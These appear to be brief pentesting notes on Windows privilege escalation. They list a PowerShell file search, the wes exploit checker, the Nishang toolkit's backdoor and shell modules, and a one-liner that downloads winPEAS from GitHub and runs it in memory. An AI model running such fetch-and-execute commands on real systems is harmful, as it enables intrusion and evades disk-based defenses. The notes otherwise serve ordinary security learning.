Powershell

powershell -c "Command"
Get-ChildItem -Path . *.txt -Recurse - search for file (this case .txt)

Winpeas

Winpeas:
url =
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

less -r file (make color coded for viewing output file of winpeas)

Nishang

contains:

  • execution
  • excalation
  • backdoors
  • bypass
  • Scans
  • shells
  • and more (website here)

wes - exploit checker for win

systeminfo > txt
wes txt - site